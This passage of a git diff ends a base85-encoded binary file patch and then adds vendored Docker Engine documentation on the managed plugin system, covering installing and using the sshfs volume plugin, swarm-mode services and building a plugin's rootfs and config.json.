zo^aCJS%BPrJ=oG3+`3jnMQ?#WNnNd=y)69(h9%-*`BoXPVPh>}9Rn128(luO@ia(P
z3BsaTl0laTvGLHo_J3mifN!B79rTJ$5(YJ%?vC>s3He|Hwj~U;@tQVc`<miryRgjw
zUC)AeUo{onyFt1g2$D5^yj>5;Wt)6sa<oQStc+D?<-Zbe$$5RrPzm2Z7<ul*Jq#9d
zWmDi@?ktyWh!SU4WOx?Fv#I-|PBfq*542a6;%ANH#~-h1n1uE01B6n#nu`ny0Os#F
zkA|m<0D_V_tyFRJ0hsoDA&lDS0{T+04xL@~+y%UnBC&&6;<s3+=PP~{H_5{VLe!HV
z-roSjTPW}77S)4)@MB05Y^MrQax7O|o9@Y4QEmtH6hQcTjc|a?D0l?p2whF?lLp@8
z7JxC;GF@m1N}u1*;Kk`y+7=>SA&dhRyKVnUbK6@hg!7&=!>L^&4l2BoMb~Rh6OKwS
z1_#}W)O8B{j_m!a)nsW|FnejEGX_ya5&vxUZ9eT-4VI;R-$e<>`*w6K@E2JwZ@j=(
z+JrfKy-`v{Nn_ooFlyw+XEo;H$mru_SdcRDtXo8jR`I@Bz*vS1eg}sjQ#L*W)1}t1
z`xr^`VO`H7f_2^1Ls<;aYqU)aHo;#TaKAjh)z*fY?6E25{K)VQ0b&$Ry!mMI`NEUq
z_n>y@)Vftn7%dUJ_(mUT3L<xm>AP2|shA~$n37lRY(jmrU-hqZyZHW;h0y!l$A#oi
z46h)WGdV4d^$3HMO)K{2=O6{>sXLTUK{+}fU-x|3cwu<^y6<-)kc2D`cz5WDumiI!
zh~7UeXTCvjj_samzwS?UQl+dwWxW!5TTE(?b%`ejzvdqsn1&JJi~i9gjGai5BgK6H
z-<-p2onnzO1`E*bkZ2U+kL@3+1`nu*@@?THqVcb*3tm8lA)qH(4!Zd(GzyV&P}e0p
z5^}*M8G{bLp~dKka}z@&++>iJ{W6Y}Afh<iO<Cqr$C;Iv(=SV4{6t*;<I!M-V;b~N
z4gtiXXyVsl>d)60k*fJsv&qyjqy?uFW?|%+y0<1#0N}u5qNxNs)A!?a)q^VG`{yqm
zyIuH?(L&d1Ol;xCa`&&=E*n*oh=cqAB3KvhK78``OJ_U)PHdwG{}JNFF-q^j0zQnq
zsrU;U*Cjwb!J<VbAOSWtUjalFwEGRL@2Q-Kv9l>9WO2ae3^B%ver7#kQcR=;1JVg6
zil1YWLEmTH?+^Y%p`~mZQu6)d*$MSvge{Z*H+J2dqfC>q4CQ&r^Et5GIH(h{h&qkX
z?8<ZFGdBthAZ$hV#r=D#gag7)d@;_?7FJF~BWY#U2Sw~aWfEXkOI!7y7mviT7LCM%
z?gmZWUNZFD(PV*`wXvkfKN(u|guobHP_0n+7NTM!m<WPB%wYWw+9$B<+<-RIyT+kg
z9=W?Z+5y^a+DTG-y2!zwNy!_&KB4F#Fun!3mo42ss0-EmkG@9V^MomFPTSp=kgH<-
zmHfca^&SHwV;+3_M793e?x-Cr@E;_owFF$y8n$rW)1OV&$NL-YB5OeASLE{Hn^N?0
zcIMyMS?|Gi{<RFIT^>~RJn*X|kzu{nAMa(}3O<u2W!F}zJ=q-<N`Z@=3t#&34%mqn
zEcSoH2nooXmC$`VuP<U?L$hALE)mq?1S&*7%t80Vgt?}^e$s1U*D{3Tf$R`3AHx{7
z1S3&HWmOvABVL~MEqh^_6A(S6Z4jMB3;ZUEW2`~AGp)dLm!*1AN(BWeJvD)mGqBLJ
zTq)*0n6+Jw7y?D|0et0ylgS+@%T5q2&<pKpcEZVw&HCHx5yI2~<55CvmhfXg@?9ig
z+9KS`_T!8>7!gZ7GBg9HD&JtisxStv`Dd8!dQl9`rsN5&O3m_6@dIS=V-ZCqsHRzL
zI4+OH1as28p*?y!`ZxCNe@;+)NtwW!ufv-C{K?P>f)8%Bf&(M>{$ZE!<u%azb90zi
zlM}C0D1e8#l3-c{9yu#y^&B@o@4)OD`)%Suho^TM`<a^yY(UiM!bPuyJMbSu@21=5
zG695IId>4gvIm)YL*SfxF@zLjk!YCmzwWO1hW|dJQqsGvBDJj0Br$J8<*sS<$3VYt
z>nxhV+{gBx_5M8_O^M=)Y|<GdT!uBjN<&g*q5aPEbPF_D4{**?w$oj|-nhm9lSEfC
zt^W4tD}dNp|F!#cCZyfZz|C|zfFVTIcXYAl;7^15z=(YJgp63hb+65@Om1Q25D5?(
z2SD(PF7^P_i-MY`ejX}Zb{6&_4HuCUjBSR&W8*QSz>?mD<Uqu<!c?PA5WFS&rW`gI
zl9KQ>>4L3n{;%m4CVEI;rbR;;U8WIb2MpGGKm`svn<(lz9HAna&&)F5qF30fz$O#j
zn|Fp7&sP`)<45yD?*^<5o$1!$qvT{zrjXuFtvdZErS5Qv4bjydLu%s~d{}vyk&2Va
z>5G<aK*#^?h>~uQq_i&Z7WPp}t)KRT@}nQ!04AMn-mWA4^tH}2zM-c`SSHWl(}(tC
zkxzzL&AK$GN5U^E7M`H&K$gmRYclJ1TxmCHd%gpvRe3K+a&IGv%cg2Gs3jUOmq$8?
z6E(D4TwiqQkxB~qH2HAHmicN9;CqP-L738=140r9p^qJ~Y<J+h4&ZVqwHd(B5!9cg
zb|{M0KgzQ5jOyzE7epd-MDwYbvWgKd4t)^Xk&45wmgi%9@4S}s=D#n9!go-B*Mx%L
z&dbUuQ@m7J{>KH6Oi#99P_?wzy8m62@xQkEkty-vLwEWF)5mR(XhK(am6cY_tXT)%
zs3~4<)(&-F>St-3=!D>m<xC3Dl6I&qc06jK42%VAQ0g5CgDGaNYWp`G_J94(SpE8z
zV@0lZX*wQ_sQ$=@Cv1rS1y`>FzN)I6^zknTi*`f}h;%@*Y|}qi75q#Xme?XJx7reH
zVUm*c$$%-6-!@GY?__QTYwimm(AseFkJ+T6&KO2&O*tIeL`1>2FnHd#27AJ6Ap3Vc
zQq#gH9iu<00QwnDGs+Y*8jIS+r@iN_t}*hD^bmt-D$kStBA3dnEaiPK@~f%azKQB6
zTFJRz&S%ErfBK6c22U<|PrF7q&(M&L3G%D;m*SnQ(%;h@w(}#n|7gk0B)*ASC`+ph
zDzm%+9i6}LDTBdNOfGSuolvYx>Tj>2^`-ZgO1fGiIqK@+`Pk=JvO|nPZEv8puDwBY
z>LtO6C!wq@&32qu<{{H^$L)asQQddHQ~AgLm&|0oDcdm$;n<<<B(lnubx=l<?X6>z
ztYh!&y;s>QTU!d*LK(^4gwONteO=$b;QPbp^MjwxIoEYN_v?PWo{xDLURdqz`QJXt
zp2?&xJ{*U)b^d)@Ix&7J#r1sFx2rJh{1~<z{qHahK+^b&$|<P-$PG?}-1xu#DvFPG
zuJZNCRiu~;)J0Qa>rZ?@2S<b9`W+1SKLIqMDG`>sV=W94gNDuZ_TzeHtdh>%myNm6
z!xbjH(9K19>kCiDJfxaM#j8YpLB9kz`%)PWksp8_6TqOI@6niS{)@_Ee<s+?%mb1W
z0eZxmdus4eH<`XD*1Z(Si@TMb*d7)a&VBC)bi1E%DArl1nQ4l6{Se<boUC1!%^>j{
zZcQnmwP{G(ZPBNw_4Y7(7V}TQ{|lc7uwsHN6#JxM^n_kJ4Ie;MDL@1xRP~c)ez)*8
zn*ny);j$D^wz!&b9ab^-mlDt>_YrsatJ|K)UVidtOY>N36E6ELh>mDL#5Rv;qYerv
zVbJw~Gw-m+6(~Swz;mT$oVCOq4c4oT3oMm;C-7+gguhteACfG_j>Mz@+_G_Lq(vj8
zEvJAfR1pp!Nunjh9Per<JKiL%F})zhPoW8h0UZz<T~xe4sQv|B$8RS{-OA5zHMZI-
z?%;!5affZdZGZi5jTWyOw+8t93bueO@cJCL7hEoDj>j_sc-PGv>hqqef>2#i3|wgf
z*b)*XU95KC-<YC)PVP@dtaL=cK~|_m0qVnEFe0VTWyuGo1stxdy7nW6r|VJO-HNZj
zZqhiyTy{Mj4w+(bIWD564#n``ekvmQ>3p~+;89oZbMh_lc*jfkglDJB`KlfFQIvK@
z%q+__?P5sCBq7J;=0d*!f;531Xl$vV;nh=XgYGry^6Nf-JS4sLtHNJ5BBUt|j5~s4
z$|U4xai5T~h|0FZ5~SGWgQ%{fmi5&cWejNNvAp`|rSba8wgvDLm03G=R+n*q1xN_|
zi|GKz1bpTW(7dbq_fo+G2F*x`h}ul`(kv!`CZxXv<$pn5*gRJnzPBq#&r13YkZM>;
zU)=cjNym$`EFY2|?QmwyuK-ueaeA`%Iv<WxY#4!d5ON#9sNcltUrWwC^!nsb6|q9J
z5>oxAQ&Fp(qkjqu=_gPMUy=++dtUUg`u;I*$=w}!?d!YT5m+bu5?qx_K>ubudLPXe
z=o5_$7Mh-^g7b9BMp^0YwJ=Uy{|NM&3Y@z;gXn^eb`}9GgFqj!+Y<=ruR8x85qb)`
zPCjt=0WaA;A{-tVJdFbm$9K^&Ioo(EjZo=l3k8T-r-2`VOp>}vUbxc$sCfAZ&x!41
zLd3xG_gHP|6YVm4-~f#fw4E7`3`Lq!8_#@va6t2|HZ7wwoqnH%uv3=iQ)=I3o7vT=
zRwEdfi!v_*;->AMhBF+k4`;f%pp&m&HN|}!tz*u|G`aVr4C=S82;%w2@`5v=9+SxW
z<SzF$ZXGEaPZ%33tFIa4Dv@=lKfF{{%qA5HPV$VFonfOxc`!J-AR-z0Sfh*e(qM6%
zOt1ok?J2g^F`8Tq{Z4U#qj1*oT@);609tX!rp>(T`3nJ-B7<drg|6!fF>>R0cWCTm
zz@|tqjje&?>#al>>21Pco_UXGGYA-c+DUxgF4JR6{3Y->#bBuOf}IC3_ChqE8PSCh
z6{!&vCwvOQ=KZg`yXynk$N}~rtf%|IG73v_h_)A{a<I@Z9hj8i&~~7N**-Upx6Q_#
z0P*V^R-v_>fE<?TIa}6~FX{CWvq%9h$uSA1;hF6a7v$RJ*&anWCPRTiPcWz8<+ANr
zM-;}75=q}vA*j#$bU^6oa~;+o*84kb8E0wVdP`@)9Cn?#Ohf?&_L9nJ2<a!eB0X=D
z@Hja%rq)IlX8MddcfEyRb!itgR!utpdtaa$k8`e@weI8@Ngi?Au!Y)vFr^LfA=dqs
zL5PR6?(Tz=AQ^SI4~3zNj_!#aHsR3lwB!m&-Yk$pY=0s(Rx52_h<#rUI_ua<AcaiT
zgd^f<wA*`5#(00#zowOzho0+iQf$UF2uAeM00PnySh75?o<xbwgX*$eE3xM$w|CT^
z7rY}9PhlJ(F)8xg8#cTlU`x~-#jHNir9(zTnooQ$4rbY9L1-bUY=V?bbN%K}CG7DP
zM-D(@(!RUkR2g?v`?gz~84PsA?*m;UvNQlJ4y}UgS@6@lW5b6MBWv{dyW4-Nsa1Ma
zxDPdj!~W5`*JafmGH|w_38Tc!=kLZ)U;}W;y+bt1M6jt{c>%tF!Q7k8tV;Rr9r5J&
z+GW+~-mx{%KN$!L@`Pd=;9^WZW44Jqbgpm~+xy?k0nW2HM_?wB=P?KD%!7q=w-f~V
z>%hr%JRDi9(<}uoZ`dCQf%}U`q1mjgURr6tO1Z~|mBWpAIC&fhn(@!LD=QxY+{jDs
zez-%|@%Tcw_XCGNLhql^pDPRclp%d|QB~(3@;)KU-o<;|N;&&o#N-@`Y8whj_m;ty
zYGgas2Uv(E2lJ~##J`@=^ZH&MKFWHXra+H&+mjl3^j!LuV3EHQ(Jq?sX4O2b{>$E7
zm^*_eReMx+50g*(XtHCdFW*Vl_7)ZAWm&C8!}@bEM_OH%mcc9a4xCmMW-L|HR7Q5F
z<X-{!rTkU%1pY#aChJ-R5N`^Tv52^^{5jcqhjZjoxGkovaCCeeN*Ak#ca=8Gv0u<0
zpDph&c!rw)pgv!GH#<P}<y{Y;W14^V(E5WU@4zG0@~5djRaN2Cv$*#4$Si>rly3%{
zgkR!PJLS>`6*}vv*_(MFkHk{p>+OituLG^<>S3bvhP*t_5pE?uznem<;Qy}Df2*>7
zEqvheaF`d#a1ClCSRA~#ecwI4z6#eSau?pO?u*!UDNB<3@G;!21)llk*8KT7QiJzm
zVSR$CkBlT*IS*bK3Ub`%T2_3e6tSb#-0eI*mv6l~(a1nFd>}<)ibd3oZv#>XTzwx~
zwi^n~52Ky>t_u&#3i0}-pv>G!{?<o61ua^QnoaTr1x>qOzlmV;%-cz6rV7hO3hZnQ
z!xQsdy6QK`({ljQaLZLC*LCFh5O(}7hn(#CR`cql4$ZI`?=d81w2^$5e@1n&?52=g
z=m2VrEVqM28oRhu2NbcbohcndJ8+nH>IvQvJJrjG{S*?onOvL&ED;|s<~czwBOQMu
zsp)<5AJ2+i=wLo~txKU7beb@ez<CNrjws-DrNQE{oom44E%B4V4sP1HKD(;2{!$P8
z)0(EPq#}68rDm)HP4Pa2ilatSx<GP*fI{+jp~CH+DGsxMVtO23mZQ+aUnjLp264~|
zxBNixfI{)ZM{4CXWr}b&YBjE|O$t6CT9W*bo%?F9MhS9VL!ORPJTw~F5?cT^a`+fO
zmodJhwY6%E3@K=Q!7bz~`n9NmsG1Nm`^<iBYY@_9gT>e8BQKoGD79VP(-~6OPt;WJ
zPr~?y%B-~$iy9`{m`$KQN;od(uxh&72XyX)*5wwRWWzWksU=Ex{LbEeLha(@U+wp4
zciVv=aX?pLw8%ufe@l1kk>J$4ND5{!qJGi_tGTLDbdV2u2=iyybgKW#K}xYyVf{_d
z5oOt6;qERQ@Z4cPl4Y(0(#>6{Nio4VpN!d6+H$?}W{<Zw?;lT_>p4HY-+iCsg23-h
z&@6uS`(<Y~R_cy*^?Z@UB|2(i!Y1fa8^5u7%7e{*AS;Ee-I|dNIEa@4xyRD{CY*a2
z9oFL+K8LpUB7OtqUwy1gQS#R}>La0KkVaH#NRUt%&xnvu{4RU2+z5`&{{obsF|bb=
z3nc_bG&Rs~q$|<A!88$?mFz=}<)16KdNZ}=b}T<oJk#6B^Edl?Qc*aP*v%{9&hnT+
zgjsFvM>8m~-etE+C*k176>Zd!=5li@NKu;qB$Yq<&QJgRTC!G9E$gtMU`~4t^|k47
zarNL5ephp;KV94x1q`G;cL!M+{ciCdQnek21{*l<{(Sldos*7f57_Pf5K(`0HjE^7
zwSzo$!yFu-h*IVr{1VTsY^I5~;>VPTfl|jC8Ug9~p7$g`7Y*&ihR6A$R{aO51fo5r
zzMo_Bi0Ny^Q#Es8ZBGuNK8qjQ^psP_6H_H_58Z9pQz!z?*8%-r7w9@&$m7Ae75C(T
zu;hq^W3N@dh;`Sr6$&6q6ho=80(vp*w{(C49s*2aQsS^n)wnj)DT5wFIB@g~GIT(W
zCcBF05$vC6pSO+c{|(21qiaE~E50C_m3SR&p7)fH_U70Dkb!7n2us&g4vb3{Aq7hr
z+PEQW&vxdh1gX&oi=C(wJQ~(3GceB&jRQ~3vh$qHC9l&>Fy!moxOn}u1xrvL`cHFC
zGAg8vv+NzBQscM&wzLR7?AyB)107xCxVXMK;2GR9ZyUIrf*X<hx4fd++f?z&sT(+H
z9}Ibg`-W@3MD=Z?z+<V#X{y{vJgF^ISmJo5@r=;%*jI5sw=)!{6PY~3)XL1jZd5Es
zSf6X-{{tQ_n+k3_aNL$NO=jw9Fr{V4>M5v5$v@@JAj$K0(b^WDx*A6(#xvTZ!}PbI
zsvzr@!Nb4-pAKb?&Z;19C-d5fB^wd@$LBAEd*X70W;3Ap(n({8<0wkxq{`6J70v!P
z&5aT!#!zt7#imRLi{<woO6AE16847n30|Spv%{Hx2)*^!ik*qSKE&{tE6@qGt8eim
zMC`Uf?@gYu*CBHvLWIg<pctr&ZGWOa66u-Iq+4KGj2pub_<JR_l8Qzr2Bw{f!d^uz
zMv3c}uNX{p6_F$sTP@#~7)(9xYotY*EAw7N$udKaK(XFgtKV^QfAjtOeB9?0`OogM
zE)@J^$Q5Bc1U?BNu~ERf(>-?8OZlt*w}U(3fAx$04~|(l+CFKhNaOv;#QyHOY`yF6
zXiJjF@d7&ctP68U@Rt9Y@_{;eex^{1jD+PsDneOK5qu3~|Nngr&uIN23q>kpTm=}a
z>Z-oPMJq@)YeAK~Nev>mJ%Iw_+Y%SWa^5NS(B1pk(}@@`{H*a{vyFxEP8E_@(nMLM
z)A+GFDiW_<%>Pn6DF0|`KMUXx9hJ9261pWVa0!W4(z%K4Fst(ezxeXkH&C3BIX(4r
zN#Pl=;Ud2g;3jSTiHXOkt_=T1T0+OE#vgUo4hrZiMgShdF8~nFcbJ9)_#JH$C%`ki
zl_W7cJp@qzlAqdSg&<Zu$m&@aqSqjl%r9$Z3-2~T;y17tU>Tg>M6(UM{s17n?fL`2
zQ`z?KuL+LZiESx_$iskC!!8WK7|q<r=>b(0NSp)7^PRth=7Z>isHy2!r7XCVJD{Ao
zHA%3@c#VWD%Oo`U9Aj-qs<N%XDrO}w3C<3?py@jMRHO#JFz5u29C5y#05><l1RdOH
zpb6svO4$ADVEdxUcX!mf$v%1kd>U*p1IK{gx9p6P9h?rScNaDPFu+(3Stb?O0WX97
z0NXtQ(|aQf(vdIXokMeA@hgh@1I=C1$Kt8>Z3Z^UtMIm8(6O(LSpS~%%bvDi0Zr;w
zbv54H68G*dg>JA%Ukf6}ARGV;U_#T;YO^jdrEamIp`mvab%4tr1kHO8$WmRny*glQ
zuSHT^y727}=G+P&got|i;oe#$yr}^3Yah4fd&5AA7z&0U_gf3tOU!;uH2vbN9OBp9
zQfg9qPR?BN-maoG-{GAptf};2*jU{r5rH!oVlXDiPaTv1e*~AMj))pR!I=WlON}E>
z)$#b_w_KSzfQR&9f$BpWeAPRI88LC+2T4X_FA(OyQUs)z8@^Hk9YIAJ$xvm!PZB7F
z);klo-y`>ch*DS2kTUG)=_y7!*^gLdybKD1uvuilV=arQYwrPu<V`z;9sVkKEfCMh
zBT#|P^TB*4GkGZ{w9<W$;9y$TVWJ%&2}%GnT~`<EsWoS@X^g&1o0~4vuY$sZNiQ1s
z3Z(S>xGIPmDe*&O-3oOWl!pL4ZQqngo|(9JU_>ruvq9PBv5}L2A8(1Y`oSQzeUmoK
z3C_aAQ?Oi=3tN3CT9?ZN3JW2<4*_-5$j%~E%+bLeMyHiKG$cqsHqm(_pUykqfu$2n
z^!4v#AbO@-`$*S2V!vns91Z-ZaOaIbrb%k^q8yCDcjKu#n!SkAf+lxxS`;B%jY%tZ
z=$$n@4<&GfA09%k<BRt^2ziOJrWq5obFh^8e9d5i3K%zh4m)?thK7cTh>Rf*F+3l)
z*5)R(pK7!?9YMpH4j{Q92tt(GaNle?{Wi7JqOcdV!SVWCuZ3_Nd)Q~3jYaI;N3muR
ze7Kj@nA<03d3rh{Bh(%lQ1V>M;}*v8$c7Q}Dg{0^#AIJst?&POG*MwYabr!KaV@Q|
zVIhOH-}}?T#GaH(#)8Pyj|U}3M$K7@^K=Jk=t^pTvoJY(`*IIY&wmyc7A$;yGZpNi
zWrLlP_%1Q+Ovm9NHYPT9Gxs=WChS{eW25AGmxm7@7GGUwlco+0Nlj%m7fvb47)@*_
zE-TBsYbU`}5RFps*{>d7>HO&&IyGe)laYa@ymE_p<;EoDF?$(~60NGMOB-~wZ@Ts<
zFVnvN{d?^pR9?uAKgug5E{@}a)vK|o(NUF$&uDiZ_l?+$Gm{f7=_DNU81P*jn4T7B
zF|Cxiaf8D+GAb(Qqg5`8hklt}sh>UH(9n>Don5%Y(*3)4v!)oAencj-k`60+W+o;U
zJpVv7cKn3-sg&7{BO^UMn{-M_%7h69y)RCAK1k8WM`p-w<?}1j^n6R5?0ACE_BF*b
zsboyktE*_quHj+5F`A2)F4<};$V7;@XRa3B;xoN5H9gJqZ$oQqIkU#ki3#J4%}s@e
zk4^a;e^CyyiF<f>aR2dnZD3+TyS24t;q0u%#Kc6*G1)$|wG}t?MNCXgw>4_#)JTCV
zJjSQar1T%lnSHi)?qQM7R(Yv3ipK$M1_2WsX;+v;r-JM1t~oh7D|lqfuH$<B?FWC&
z?Gd^uU4P0{NjvQ;Zr19?clGM*jO$Pr+0*$&>viMrOop?yq{o*Jp5Kep4{aAv%Brru
zx9=t6j6*&AzOcBcTvk~bUQlqw%}RDsQ}<6HWz@;+tcAZe-?f^~PKCp>PWWbGpPvlt
z>+6>shKG|nucChaURi;CjfDL(E-H$2yNiUfkeOpr;&QfZMj!PB!bastQgKa9%}2}{
z%zR3Rjnn_?r|qw<t@X^!<&F{HUy9bjxh5qh#;)}D_x~~|UwM>IiT8{b6H46q{d<;;
ztu0$$FZnsH+i5;#W@ba?j%iqnJZ*=^W!GBWaI2NUj2h|5;qD*TJ9s1|Q>MyoOq?c5
z<qZv^iIwqv`0<jGk|6Ie;NN3W&8?!MqB!`yDRY(R3*n|E-^Su?bWKZ(adBy>c0fm#
zGZtGCpOC<_va*u*+(m(mj7+iUsfWj1Ch}lmQBlPee>uNRSJWpISBMwAGWQ#8h9yGD
z;+&j-j3B0;o12@LHp#~150@4fv%L6~g-{|+Ed9!|<K%c3!u#g#J-)^`sUW)<k<6R1
zwsk;L7WZvgtcJN!=SSq^lX|=~_~*Ind+TgnaHOQ9ie4K>$BNjL^mJWeVPTyc(VpE>
z&CShA$8x?kN%8T~>1u5xK?+i2J<8T)jo$_bxh*X%OUUEz5e*pKuCbfum!4pcAs!`D
zljrPAi?JqBA=#{VH^*^KQ@U;@DSqGM@QWZ%y+V5J-@#k&HFsUEr+1@=WH?xk>+9>o
z-v4ATd?1_>a{1j468QZMLIQgHNLvi%J88@VEcV4USqa6*0U{zIB_!CUfu+^eNP}$D
zmLC&d9q)}xHEX|rbL*8Ryph2~X{f7v+kX4nU+23(m(7a%Ha~CWY%D1$d0ttF4?fAo
zM9$mJ#L3(|sev=DGg+qVnC)(ntHT>DDlJttG&0Jy7B-?UGr$o%->*6odqE~k&O%a&
zBfWaQVu5ah32wSi{kCIsTiX>i|M1brdhNXgMzov0zwdOmH$*1Bj8l|jM^Wt)QMK>U
z=<DfmI~-7G2+YSv3*cw>EV-7fbai#n_)Jes=qyv$qFivHO`FbB)MrEGI@!-8@;UeK
z-^Abla@yPbeBDE;bH$yD@5)%Hs$R)OGQ&hzP@H%qerHBX_QyUfE*32=FaI+-I=cNW
z7>mVHV|IJB<Fj=vaStd${r+BqG7A3zx0wG$BMn`+B4j<{sP-wGgT(o&`xQChN1M*5
M+|p32P{0KI54=tH{r~^~

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/docs/extend/index.md b/vendor/github.com/docker/docker/docs/extend/index.md
new file mode 100644
index 0000000000..1410b205e5
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/extend/index.md
@@ -0,0 +1,222 @@
+---
+description: Develop and use a plugin with the managed plugin system
+keywords: "API, Usage, plugins, documentation, developer"
+title: Managed plugin system
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# Docker Engine managed plugin system
+
+* [Installing and using a plugin](index.md#installing-and-using-a-plugin)
+* [Developing a plugin](index.md#developing-a-plugin)
+
+Docker Engine's plugins system allows you to install, start, stop, and remove
+plugins using Docker Engine. This mechanism is currently only available for
+volume drivers, but more plugin driver types will be available in future releases.
+
+For information about the legacy plugin system available in Docker Engine 1.12
+and earlier, see [Understand legacy Docker Engine plugins](legacy_plugins.md).
+
+> **Note**: Docker Engine managed plugins are currently not supported
+on Windows daemons.
+
+## Installing and using a plugin
+
+Plugins are distributed as Docker images and can be hosted on Docker Hub or on
+a private registry.
+
+To install a plugin, use the `docker plugin install` command, which pulls the
+plugin from Docker hub or your private registry, prompts you to grant
+permissions or capabilities if necessary, and enables the plugin.
+
+To check the status of installed plugins, use the `docker plugin ls` command.
+Plugins that start successfully are listed as enabled in the output.
+
+After a plugin is installed, you can use it as an option for another Docker
+operation, such as creating a volume.
+
+In the following example, you install the `sshfs` plugin, verify that it is
+enabled, and use it to create a volume.
+
+1.  Install the `sshfs` plugin.
+
+    ```bash
+    $ docker plugin install vieux/sshfs
+
+    Plugin "vieux/sshfs" is requesting the following privileges:
+    - network: [host]
+    - capabilities: [CAP_SYS_ADMIN]
+    Do you grant the above permissions? [y/N] y
+
+    vieux/sshfs
+    ```
+
+    The plugin requests 2 privileges:
+    - It needs access to the `host` network.
+    - It needs the `CAP_SYS_ADMIN` capability, which allows the plugin to run
+    the `mount` command.
+
+2.  Check that the plugin is enabled in the output of `docker plugin ls`.
+
+    ```bash
+    $ docker plugin ls
+
+    ID                    NAME                  TAG                 DESCRIPTION                   ENABLED
+    69553ca1d789          vieux/sshfs           latest              the `sshfs` plugin            true
+    ```
+
+3.  Create a volume using the plugin.
+    This example mounts the `/remote` directory on host `1.2.3.4` into a
+    volume named `sshvolume`. This volume can now be mounted into containers.
+
+    ```bash
+    $ docker volume create \
+      -d vieux/sshfs \
+      --name sshvolume \
+      -o sshcmd=user@1.2.3.4:/remote
+
+    sshvolume
+    ```
+4.  Verify that the volume was created successfully.
+
+    ```bash
+    $ docker volume ls
+
+    DRIVER              NAME
+    vieux/sshfs         sshvolume
+    ```
+
+5.  Start a container that uses the volume `sshvolume`.
+
+    ```bash
+    $ docker run -v sshvolume:/data busybox ls /data
+
+    <content of /remote on machine 1.2.3.4>
+    ```
+
+To disable a plugin, use the `docker plugin disable` command. To completely
+remove it, use the `docker plugin remove` command. For other available
+commands and options, see the
+[command line reference](../reference/commandline/index.md).
+
+## Service creation using plugins
+
+In swarm mode, it is possible to create a service that allows for attaching
+to networks or mounting volumes. Swarm schedules services based on plugin availability
+on a node. In this example, a volume plugin is installed on a swarm worker and a volume 
+is created using the plugin. In the manager, a service is created with the relevant
+mount options. It can be observed that the service is scheduled to run on the worker
+node with the said volume plugin and volume. 
+
+In the following example, node1 is the manager and node2 is the worker.
+
+1.  Prepare manager. In node 1:
+
+    ```bash
+    $ docker swarm init
+    Swarm initialized: current node (dxn1zf6l61qsb1josjja83ngz) is now a manager.
+    ```
+
+2. Join swarm, install plugin and create volume on worker. In node 2:
+
+    ```bash
+    $ docker swarm join \
+    --token SWMTKN-1-49nj1cmql0jkz5s954yi3oex3nedyz0fb0xx14ie39trti4wxv-8vxv8rssmk743ojnwacrr2e7c \
+    192.168.99.100:2377
+    ```
+
+    ```bash
+    $ docker plugin install tiborvass/sample-volume-plugin
+    latest: Pulling from tiborvass/sample-volume-plugin
+    eb9c16fbdc53: Download complete
+    Digest: sha256:00b42de88f3a3e0342e7b35fa62394b0a9ceb54d37f4c50be5d3167899994639
+    Status: Downloaded newer image for tiborvass/sample-volume-plugin:latest
+    Installed plugin tiborvass/sample-volume-plugin
+    ```
+	
+    ```bash
+    $ docker volume create -d tiborvass/sample-volume-plugin --name pluginVol
+    ```
+
+3. Create a service using the plugin and volume. In node1:
+
+    ```bash
+    $ docker service create --name my-service --mount type=volume,volume-driver=tiborvass/sample-volume-plugin,source=pluginVol,destination=/tmp busybox top
+
+    $ docker service ls
+    z1sj8bb8jnfn  my-service   replicated  1/1       busybox:latest 
+    ```
+    docker service ls shows service 1 instance of service running.
+
+4. Observe the task getting scheduled in node 2:
+
+    ```bash
+    $ docker ps --format '{{.ID}}\t {{.Status}} {{.Names}} {{.Command}}' 
+    83fc1e842599     Up 2 days my-service.1.9jn59qzn7nbc3m0zt1hij12xs "top"
+    ```
+
+## Developing a plugin
+
+#### The rootfs directory
+The `rootfs` directory represents the root filesystem of the plugin. In this
+example, it was created from a Dockerfile:
+
+>**Note:** The `/run/docker/plugins` directory is mandatory inside of the
+plugin's filesystem for docker to communicate with the plugin.
+
+```bash
+$ git clone https://github.com/vieux/docker-volume-sshfs
+$ cd docker-volume-sshfs
+$ docker build -t rootfsimage .
+$ id=$(docker create rootfsimage true) # id was cd851ce43a403 when the image was created
+$ sudo mkdir -p myplugin/rootfs
+$ sudo docker export "$id" | sudo tar -x -C myplugin/rootfs
+$ docker rm -vf "$id"
+$ docker rmi rootfsimage
+```
+
+#### The config.json file
+
+The `config.json` file describes the plugin. See the [plugins config reference](config.md).
+
+Consider the following `config.json` file.
+
+```json
+{
+	"description": "sshFS plugin for Docker",
+	"documentation": "https://docs.docker.com/engine/extend/plugins/",
+	"entrypoint": ["/go/bin/docker-volume-sshfs"],
+	"network": {
+		   "type": "host"
+		   },
+	"interface" : {
+		   "types": ["docker.volumedriver/1.0"],
+		   "socket": "sshfs.sock"
+	},
+	"capabilities": ["CAP_SYS_ADMIN"]
+}
+```
+
+This plugin is a volume driver. It requires a `host` network and the
+`CAP_SYS_ADMIN` capability. It depends upon the `/go/bin/docker-volume-sshfs`
+entrypoint and uses the `/run/docker/plugins/sshfs.sock` socket to communicate
+with Docker Engine. This plugin has no runtime parameters.
+
+#### Creating the plugin
+
+A new plugin can be created by running
+`docker plugin create <plugin-name> ./path/to/plugin/data` where the plugin
+data contains a plugin configuration file `config.json` and a root filesystem
+in subdirectory `rootfs`. 
+
+After that the plugin `<plugin-name>` will show up in `docker plugin ls`.
+Plugins can be pushed to remote registries with
+`docker plugin push <plugin-name>`.
diff --git a/vendor/github.com/docker/docker/docs/extend/legacy_plugins.md b/vendor/github.com/docker/docker/docs/extend/legacy_plugins.md
new file mode 100644
index 0000000000..6ac914e366
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/extend/legacy_plugins.md
@@ -0,0 +1,98 @@
+---
+redirect_from:
+- "/engine/extend/plugins/"
+title: "Use Docker Engine plugins"
+description: "How to add additional functionality to Docker with plugins extensions"
+keywords: "Examples, Usage, plugins, docker, documentation, user guide"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# Use Docker Engine plugins
+
+This document describes the Docker Engine plugins generally available in Docker
+Engine. To view information on plugins managed by Docker,
+refer to [Docker Engine plugin system](index.md).
